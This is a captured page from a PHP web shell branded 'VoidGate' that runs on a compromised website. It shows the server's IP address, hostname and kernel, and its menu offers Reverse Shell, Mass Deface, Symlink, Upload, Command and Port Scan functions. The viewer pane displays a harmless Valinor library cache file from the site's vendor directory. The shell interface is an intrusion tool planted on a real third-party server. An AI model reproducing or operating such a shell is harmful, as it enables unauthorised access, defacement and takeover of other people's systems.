ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
vendor
/
cuyz
/
valinor
/
src
/
Cache
/
Viewing: KeySanitizerCache.php
<?php declare(strict_types=1); namespace CuyZ\Valinor\Cache; use CuyZ\Valinor\Library\Settings; use CuyZ\Valinor\Utility\Package; use function hash; use function strstr; /** * @internal * * @template EntryType * @implements Cache<EntryType> */ final class KeySanitizerCache implements Cache { private static string $version; public function __construct( /** @var Cache<EntryType> */ private Cache $delegate, private Settings $settings, ) {} public function get(string $key, mixed ...$arguments): mixed { return $this->delegate->get($this->sanitize($key), ...$arguments); } public function set(string $key, CacheEntry $entry): void { $this->delegate->set($this->sanitize($key), $entry); } public function clear(): void { $this->delegate->clear(); } /** * @return non-empty-string */ private function sanitize(string $key): string { // @infection-ignore-all self::$version ??= PHP_VERSION . '/' . Package::version(); $firstPart = strstr($key, "\0", before_needle: true); // @infection-ignore-all return $firstPart . hash('xxh128', $key . $this->settings->hash() . self::$version); } }
Coded With 💗 by
0x6ick